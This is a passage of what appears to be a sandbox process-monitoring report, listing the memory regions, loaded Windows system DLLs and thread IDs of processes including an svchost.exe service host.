= 0x7ffc518e4fff entry_point = 0x7ffc51890000 region_type = mapped_file name = "profsvc.dll" filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll") Region: id = 1431 start_va = 0x7ffc519c0000 end_va = 0x7ffc51a24fff entry_point = 0x7ffc519c0000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 1432 start_va = 0x7ffc51c30000 end_va = 0x7ffc51c3afff entry_point = 0x7ffc51c30000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 1433 start_va = 0x7ffc51c50000 end_va = 0x7ffc51c87fff entry_point = 0x7ffc51c50000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 1434 start_va = 0x7ffc51ca0000 end_va = 0x7ffc51ca9fff entry_point = 0x7ffc51ca0000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 1435 start_va = 0x7ffc51cb0000 end_va = 0x7ffc51cc7fff entry_point = 0x7ffc51cb0000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 1436 start_va = 0x7ffc51cd0000 end_va = 0x7ffc51e1cfff entry_point = 0x7ffc51cd0000 region_type = mapped_file name = "gpsvc.dll" filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll") Region: id = 1437 start_va = 0x7ffc52640000 end_va = 0x7ffc52652fff entry_point = 0x7ffc52640000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 1438 start_va = 0x7ffc52cd0000 end_va = 0x7ffc52d47fff entry_point = 0x7ffc52cd0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1439 start_va = 0x7ffc52d70000 end_va = 0x7ffc52e05fff entry_point = 0x7ffc52d70000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1440 start_va = 0x7ffc52ef0000 end_va = 0x7ffc52f16fff entry_point = 0x7ffc52ef0000 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1441 start_va = 0x7ffc530d0000 end_va = 0x7ffc530dbfff entry_point = 0x7ffc530d0000 region_type = mapped_file name = "sysntfy.dll" filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll") Region: id = 1442 start_va = 0x7ffc532b0000 end_va = 0x7ffc532e1fff entry_point = 0x7ffc532b0000 region_type = mapped_file name = "fwbase.dll" filename = "\\Windows\\System32\\fwbase.dll" (normalized: "c:\\windows\\system32\\fwbase.dll") Region: id = 1443 start_va = 0x7ffc532f0000 end_va = 0x7ffc53371fff entry_point = 0x7ffc532f0000 region_type = mapped_file name = "firewallapi.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll") Region: id = 1444 start_va = 0x7ffc534a0000 end_va = 0x7ffc534c2fff entry_point = 0x7ffc534a0000 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll") Region: id = 1445 start_va = 0x7ffc535d0000 end_va = 0x7ffc535dbfff entry_point = 0x7ffc535d0000 region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 1446 start_va = 0x7ffc53640000 end_va = 0x7ffc53687fff entry_point = 0x7ffc53640000 region_type = mapped_file name = "authz.dll" filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll") Region: id = 1447 start_va = 0x7ffc53720000 end_va = 0x7ffc53777fff entry_point = 0x7ffc53720000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 1448 start_va = 0x7ffc53810000 end_va = 0x7ffc5382bfff entry_point = 0x7ffc53810000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1449 start_va = 0x7ffc53830000 end_va = 0x7ffc5383bfff entry_point = 0x7ffc53830000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 1450 start_va = 0x7ffc53840000 end_va = 0x7ffc53865fff entry_point = 0x7ffc53840000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 1451 start_va = 0x7ffc53920000 end_va = 0x7ffc53951fff entry_point = 0x7ffc53920000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 1452 start_va = 0x7ffc53a90000 end_va = 0x7ffc53ac2fff entry_point = 0x7ffc53a90000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 1453 start_va = 0x7ffc53b80000 end_va = 0x7ffc53b9efff entry_point = 0x7ffc53b80000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1454 start_va = 0x7ffc53ba0000 end_va = 0x7ffc53bddfff entry_point = 0x7ffc53ba0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 1455 start_va = 0x7ffc53be0000 end_va = 0x7ffc53c87fff entry_point = 0x7ffc53be0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 1456 start_va = 0x7ffc53dd0000 end_va = 0x7ffc53e2cfff entry_point = 0x7ffc53dd0000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 1457 start_va = 0x7ffc53f30000 end_va = 0x7ffc53f65fff entry_point = 0x7ffc53f30000 region_type = mapped_file name = "ntasn1.dll" filename = "\\Windows\\System32\\ntasn1.dll" (normalized: "c:\\windows\\system32\\ntasn1.dll") Region: id = 1458 start_va = 0x7ffc53f70000 end_va = 0x7ffc53f95fff entry_point = 0x7ffc53f70000 region_type = mapped_file name = "ncrypt.dll" filename = "\\Windows\\System32\\ncrypt.dll" (normalized: "c:\\windows\\system32\\ncrypt.dll") Region: id = 1459 start_va = 0x7ffc541f0000 end_va = 0x7ffc541f9fff entry_point = 0x7ffc541f0000 region_type = mapped_file name = "dpapi.dll" filename = "\\Windows\\System32\\dpapi.dll" (normalized: "c:\\windows\\system32\\dpapi.dll") Region: id = 1460 start_va = 0x7ffc54210000 end_va = 0x7ffc54226fff entry_point = 0x7ffc54210000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 1461 start_va = 0x7ffc54280000 end_va = 0x7ffc5428afff entry_point = 0x7ffc54280000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1462 start_va = 0x7ffc542c0000 end_va = 0x7ffc542e0fff entry_point = 0x7ffc542c0000 region_type = mapped_file name = "joinutil.dll" filename = "\\Windows\\System32\\joinutil.dll" (normalized: "c:\\windows\\system32\\joinutil.dll") Region: id = 1463 start_va = 0x7ffc54320000 end_va = 0x7ffc5434bfff entry_point = 0x7ffc54320000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1464 start_va = 0x7ffc54370000 end_va = 0x7ffc54389fff entry_point = 0x7ffc54370000 region_type = mapped_file name = "eventaggregation.dll" filename = "\\Windows\\System32\\EventAggregation.dll" (normalized: "c:\\windows\\system32\\eventaggregation.dll") Region: id = 1465 start_va = 0x7ffc54390000 end_va = 0x7ffc54397fff entry_point = 0x7ffc54390000 region_type = mapped_file name = "dabapi.dll" filename = "\\Windows\\System32\\dabapi.dll" (normalized: "c:\\windows\\system32\\dabapi.dll") Region: id = 1466 start_va = 0x7ffc543a0000 end_va = 0x7ffc543c7fff entry_point = 0x7ffc543a0000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 1467 start_va = 0x7ffc543d0000 end_va = 0x7ffc5443afff entry_point = 0x7ffc543d0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1468 start_va = 0x7ffc54440000 end_va = 0x7ffc544d7fff entry_point = 0x7ffc54440000 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\System32\\sxs.dll" (normalized: "c:\\windows\\system32\\sxs.dll") Region: id = 1469 start_va = 0x7ffc54580000 end_va = 0x7ffc54592fff entry_point = 0x7ffc54580000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1470 start_va = 0x7ffc545a0000 end_va = 0x7ffc545e9fff entry_point = 0x7ffc545a0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1471 start_va = 0x7ffc545f0000 end_va = 0x7ffc54600fff entry_point = 0x7ffc545f0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 1472 start_va = 0x7ffc54610000 end_va = 0x7ffc5461efff entry_point = 0x7ffc54610000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1473 start_va = 0x7ffc54620000 end_va = 0x7ffc54663fff entry_point = 0x7ffc54620000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1474 start_va = 0x7ffc54670000 end_va = 0x7ffc54c97fff entry_point = 0x7ffc54670000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1475 start_va = 0x7ffc54ca0000 end_va = 0x7ffc54cf3fff entry_point = 0x7ffc54ca0000 region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" (normalized: "c:\\windows\\system32\\wintrust.dll") Region: id = 1476 start_va = 0x7ffc54db0000 end_va = 0x7ffc54f70fff entry_point = 0x7ffc54db0000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 1477 start_va = 0x7ffc54f80000 end_va = 0x7ffc55032fff entry_point = 0x7ffc54f80000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1478 start_va = 0x7ffc55040000 end_va = 0x7ffc5521cfff entry_point = 0x7ffc55040000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1479 start_va = 0x7ffc55220000 end_va = 0x7ffc5527afff entry_point = 0x7ffc55220000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 1480 start_va = 0x7ffc552c0000 end_va = 0x7ffc5535cfff entry_point = 0x7ffc552c0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1481 start_va = 0x7ffc554e0000 end_va = 0x7ffc5562dfff entry_point = 0x7ffc554e0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1482 start_va = 0x7ffc55630000 end_va = 0x7ffc557f4fff entry_point = 0x7ffc55630000 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1483 start_va = 0x7ffc55800000 end_va = 0x7ffc558acfff entry_point = 0x7ffc55800000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1484 start_va = 0x7ffc55910000 end_va = 0x7ffc559cdfff entry_point = 0x7ffc55910000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1485 start_va = 0x7ffc559d0000 end_va = 0x7ffc56ef4fff entry_point = 0x7ffc559d0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1486 start_va = 0x7ffc56f00000 end_va = 0x7ffc56f07fff entry_point = 0x7ffc56f00000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1487 start_va = 0x7ffc56f10000 end_va = 0x7ffc57094fff entry_point = 0x7ffc56f10000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1488 start_va = 0x7ffc570a0000 end_va = 0x7ffc571c5fff entry_point = 0x7ffc570a0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1489 start_va = 0x7ffc571d0000 end_va = 0x7ffc5744bfff entry_point = 0x7ffc571d0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1490 start_va = 0x7ffc57540000 end_va = 0x7ffc5759afff entry_point = 0x7ffc57540000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1491 start_va = 0x7ffc57750000 end_va = 0x7ffc57890fff entry_point = 0x7ffc57750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1492 start_va = 0x7ffc578a0000 end_va = 0x7ffc578f0fff entry_point = 0x7ffc578a0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1493 start_va = 0x7ffc57900000 end_va = 0x7ffc57968fff entry_point = 0x7ffc57900000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1494 start_va = 0x7ffc57970000 end_va = 0x7ffc57a14fff entry_point = 0x7ffc57970000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1495 start_va = 0x7ffc57aa0000 end_va = 0x7ffc57b45fff entry_point = 0x7ffc57aa0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1496 start_va = 0x7ffc57b50000 end_va = 0x7ffc57d11fff entry_point = 0x7ffc57b50000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3403 start_va = 0xb431100000 end_va = 0xb4311fffff entry_point = 0x0 region_type = private name = "private_0x000000b431100000" filename = "" Region: id = 3404 start_va = 0x7ff6e0136000 end_va = 0x7ff6e0137fff entry_point = 0x0 region_type = private name = "private_0x00007ff6e0136000" filename = "" Region: id = 3405 start_va = 0x7ffc4f5d0000 end_va = 0x7ffc4f61ffff entry_point = 0x7ffc4f5d0000 region_type = mapped_file name = "cscobj.dll" filename = "\\Windows\\System32\\cscobj.dll" (normalized: "c:\\windows\\system32\\cscobj.dll") Thread: id = 152 os_tid = 0xc6c Thread: id = 153 os_tid = 0xc30 Thread: id = 154 os_tid = 0xffc Thread: id = 155 os_tid = 0xff8 Thread: id = 156 os_tid = 0xff4 Thread: id = 157 os_tid = 0xff0 Thread: id = 158 os_tid = 0xfec Thread: id = 159 os_tid = 0xfe8 Thread: id = 160 os_tid = 0xfe4 Thread: id = 161 os_tid = 0xfe0 Thread: id = 162 os_tid = 0xfdc Thread: id = 163 os_tid = 0xfd8 Thread: id = 164 os_tid = 0xfd4 Thread: id = 165 os_tid = 0xfd0 Thread: id = 166 os_tid = 0xfcc Thread: id = 167 os_tid = 0xfc8 Thread: id = 168 os_tid = 0xfa0 Thread: id = 169 os_tid = 0xf9c Thread: id = 170 os_tid = 0xf28 Thread: id = 171 os_tid = 0xf18 Thread: id = 172 os_tid = 0xf14 Thread: id = 173 os_tid = 0xf10 Thread: id = 174 os_tid = 0xf0c Thread: id = 175 os_tid = 0xf08 Thread: id = 176 os_tid = 0xf04 Thread: id = 177 os_tid = 0xf00 Thread: id = 178 os_tid = 0xefc Thread: id = 179 os_tid = 0xec4 Thread: id = 180 os_tid = 0xec0 Thread: id = 181 os_tid = 0xe94 Thread: id = 182 os_tid = 0xd88 Thread: id = 183 os_tid = 0x1a4 Thread: id = 184 os_tid = 0x1b4 Thread: id = 185 os_tid = 0x204 Thread: id = 186 os_tid = 0xa10 Thread: id = 187 os_tid = 0xb18 Thread: id = 188 os_tid = 0x564 Thread: id = 189 os_tid = 0x518 Thread: id = 190 os_tid = 0x2cc Thread: id = 191 os_tid = 0xb38 Thread: id = 192 os_tid = 0x8bc Thread: id = 193 os_tid = 0xa70 Thread: id = 194 os_tid = 0x6d8 Thread: id = 195 os_tid = 0x24c Thread: id = 196 os_tid = 0x8b4 Thread: id = 197 os_tid = 0x8b0 Thread: id = 198 os_tid = 0x894 Thread: id = 199 os_tid = 0x864 Thread: id = 200 os_tid = 0x43c Thread: id = 201 os_tid = 0x7a8 Thread: id = 202 os_tid = 0x778 Thread: id = 203 os_tid = 0x758 Thread: id = 204 os_tid = 0x750 Thread: id = 205 os_tid = 0x73c Thread: id = 206 os_tid = 0x734 Thread: id = 207 os_tid = 0x730 Thread: id = 208 os_tid = 0x72c Thread: id = 209 os_tid = 0x700 Thread: id = 210 os_tid = 0x6fc Thread: id = 211 os_tid = 0x64c Thread: id = 212 os_tid = 0x634 Thread: id = 213 os_tid = 0x624 Thread: id = 214 os_tid = 0x604 Thread: id = 215 os_tid = 0x600 Thread: id = 216 os_tid = 0x5f8 Thread: id = 217 os_tid = 0x5f0 Thread: id = 218 os_tid = 0x5ec Thread: id = 219 os_tid = 0x5e8 Thread: id = 220 os_tid = 0x5e4 Thread: id = 221 os_tid = 0x5e0 Thread: id = 222 os_tid = 0x5c8 Thread: id = 223 os_tid = 0x5b4 Thread: id = 224 os_tid = 0x5b0 Thread: id = 225 os_tid = 0x594 Thread: id = 226 os_tid = 0x590 Thread: id = 227 os_tid = 0x574 Thread: id = 228 os_tid = 0x50c Thread: id = 229 os_tid = 0x40c Thread: id = 230 os_tid = 0x374 Thread: id = 231 os_tid = 0x140 Thread: id = 232 os_tid = 0x18c Thread: id = 233 os_tid = 0x14c Thread: id = 234 os_tid = 0xfc Thread: id = 235 os_tid = 0xf8 Thread: id = 236 os_tid = 0xf4 Thread: id = 237 os_tid = 0x3fc Thread: id = 238 os_tid = 0x3ec Thread: id = 239 os_tid = 0x3e8 Thread: id = 240 os_tid = 0x3e0 Thread: id = 241 os_tid = 0x3d0 Thread: id = 242 os_tid = 0x3cc Thread: id = 243 os_tid = 0x3c8 Thread: id = 244 os_tid = 0x3b8 Thread: id = 245 os_tid = 0x390 Thread: id = 246 os_tid = 0x328 Thread: id = 453 os_tid = 0xd40 Thread: id = 454 os_tid = 0xd38 Thread: id = 457 os_tid = 0xc14 Thread: id = 459 os_tid = 0x75c Process: id = "8" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x475f7000" os_pid = "0x32c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AppIDSvc" [0xa], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xa], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\icssvc" [0xa], "NT SERVICE\\lmhosts" [0xe], "NT SERVICE\\NgcCtnrSvc" [0xa], "NT SERVICE\\vmictimesync" [0xa], "NT SERVICE\\Wcmsvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000dbb3" [0xc000000f], "LOCAL" [0x7] Region: id = 2000 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2001 start_va = 0x448a600000 end_va = 0x448a60ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a600000" filename = "" Region: id = 2002 start_va = 0x448a610000 end_va = 0x448a610fff entry_point = 0x448a610000 region_type = mapped_file name = "svchost.exe.mui" filename = "\\Windows\\System32\\en-US\\svchost.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\svchost.exe.mui") Region: id = 2003 start_va = 0x448a620000 end_va = 0x448a633fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a620000" filename = "" Region: id = 2004 start_va = 0x448a640000 end_va = 0x448a6bffff entry_point = 0x0 region_type = private name = "private_0x000000448a640000" filename = "" Region: id = 2005 start_va = 0x448a6c0000 end_va = 0x448a6c3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a6c0000" filename = "" Region: id = 2006 start_va = 0x448a6d0000 end_va = 0x448a6d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a6d0000" filename = "" Region: id = 2007 start_va = 0x448a6e0000 end_va = 0x448a6e1fff entry_point = 0x0 region_type = private name = "private_0x000000448a6e0000" filename = "" Region: id = 2008 start_va = 0x448a6f0000 end_va = 0x448a7adfff entry_point = 0x448a6f0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2009 start_va = 0x448a7b0000 end_va = 0x448a7b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a7b0000" filename = "" Region: id = 2010 start_va = 0x448a7c0000 end_va = 0x448a7c0fff entry_point = 0x0 region_type = private name = "private_0x000000448a7c0000" filename = "" Region: id = 2011 start_va = 0x448a830000 end_va = 0x448a830fff entry_point = 0x0 region_type = private name = "private_0x000000448a830000" filename = "" Region: id = 2012 start_va = 0x448a840000 end_va = 0x448a840fff entry_point = 0x0 region_type = private name = "private_0x000000448a840000" filename = "" Region: id = 2013 start_va = 0x448a850000 end_va = 0x448a850fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448a850000" filename = "" Region: id = 2014 start_va = 0x448a860000 end_va = 0x448a866fff entry_point = 0x0 region_type = private name = "private_0x000000448a860000" filename = "" Region: id = 2015 start_va = 0x448a870000 end_va = 0x448a8d4fff entry_point = 0x448a870000 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll") Region: id = 2016 start_va = 0x448a8e0000 end_va = 0x448a8fffff entry_point = 0x0 region_type = private name = "private_0x000000448a8e0000" filename = "" Region: id = 2017 start_va = 0x448a900000 end_va = 0x448a9fffff entry_point = 0x0 region_type = private name = "private_0x000000448a900000" filename = "" Region: id = 2018 start_va = 0x448aa00000 end_va = 0x448ab87fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448aa00000" filename = "" Region: id = 2019 start_va = 0x448ab90000 end_va = 0x448abaffff entry_point = 0x0 region_type = private name = "private_0x000000448ab90000" filename = "" Region: id = 2020 start_va = 0x448abb0000 end_va = 0x448abcffff entry_point = 0x0 region_type = private name = "private_0x000000448abb0000" filename = "" Region: id = 2021 start_va = 0x448abd0000 end_va = 0x448abd0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448abd0000" filename = "" Region: id = 2022 start_va = 0x448abe0000 end_va = 0x448abe6fff entry_point = 0x0 region_type = private name = "private_0x000000448abe0000" filename = "" Region: id = 2023 start_va = 0x448abf0000 end_va = 0x448abf0fff entry_point = 0x0 region_type = private name = "private_0x000000448abf0000" filename = "" Region: id = 2024 start_va = 0x448ac00000 end_va = 0x448acfffff entry_point = 0x0 region_type = private name = "private_0x000000448ac00000" filename = "" Region: id = 2025 start_va = 0x448ad00000 end_va = 0x448ae80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448ad00000" filename = "" Region: id = 2026 start_va = 0x448ae90000 end_va = 0x448af4ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448ae90000" filename = "" Region: id = 2027 start_va = 0x448af50000 end_va = 0x448b04ffff entry_point = 0x0 region_type = private name = "private_0x000000448af50000" filename = "" Region: id = 2028 start_va = 0x448b050000 end_va = 0x448b0cffff entry_point = 0x0 region_type = private name = "private_0x000000448b050000" filename = "" Region: id = 2029 start_va = 0x448b0d0000 end_va = 0x448b14ffff entry_point = 0x0 region_type = private name = "private_0x000000448b0d0000" filename = "" Region: id = 2030 start_va = 0x448b150000 end_va = 0x448b1cffff entry_point = 0x0 region_type = private name = "private_0x000000448b150000" filename = "" Region: id = 2031 start_va = 0x448b250000 end_va = 0x448b34ffff entry_point = 0x0 region_type = private name = "private_0x000000448b250000" filename = "" Region: id = 2032 start_va = 0x448b350000 end_va = 0x448b3cffff entry_point = 0x0 region_type = private name = "private_0x000000448b350000" filename = "" Region: id = 2033 start_va = 0x448b3d0000 end_va = 0x448b3d6fff entry_point = 0x0 region_type = private name = "private_0x000000448b3d0000" filename = "" Region: id = 2034 start_va = 0x448b3e0000 end_va = 0x448b3e0fff entry_point = 0x0 region_type = private name = "private_0x000000448b3e0000" filename = "" Region: id = 2035 start_va = 0x448b3f0000 end_va = 0x448b3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000448b3f0000" filename = "" Region: id = 2036 start_va = 0x448b400000 end_va = 0x448b4fffff entry_point = 0x0 region_type = private name = "private_0x000000448b400000" filename = "" Region: id = 2037 start_va = 0x448b500000 end_va = 0x448b57ffff entry_point = 0x0 region_type = private name = "private_0x000000448b500000" filename = "" Region: id = 2038 start_va = 0x448b580000 end_va = 0x448b5fffff entry_point = 0x0 region_type = private name = "private_0x000000448b580000" filename = "" Region: id = 2039 start_va = 0x448b600000 end_va = 0x448b67ffff entry_point = 0x0 region_type = private name = "private_0x000000448b600000" filename = "" Region: id = 2040 start_va = 0x448b680000 end_va = 0x448b6fffff entry_point = 0x0 region_type = private name = "private_0x000000448b680000" filename = "" Region: id = 2041 start_va = 0x448b700000 end_va = 0x448b7fffff entry_point = 0x0 region_type = private name = "private_0x000000448b700000" filename = "" Region: id = 2042 start_va = 0x448b800000 end_va = 0x448b8fffff entry_point = 0x0 region_type = private name = "private_0x000000448b800000" filename = "" Region: id = 2043 start_va = 0x448b900000 end_va = 0x448b9fffff entry_point = 0x0 region_type = private name = "private_0x000000448b900000" filename = "" Region: id = 2044 start_va = 0x448ba00000 end_va = 0x448bafffff entry_point = 0x0 region_type = private name = "private_0x000000448ba00000" filename = "" Region: id = 2045 start_va = 0x448bb00000 end_va = 0x448be36fff entry_point = 0x448bb00000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2046 start_va = 0x448be40000 end_va = 0x448bf3ffff entry_point = 0x0 region_type = private name = "private_0x000000448be40000" filename = "" Region: id = 2047 start_va = 0x448bf40000 end_va = 0x448c03ffff entry_point = 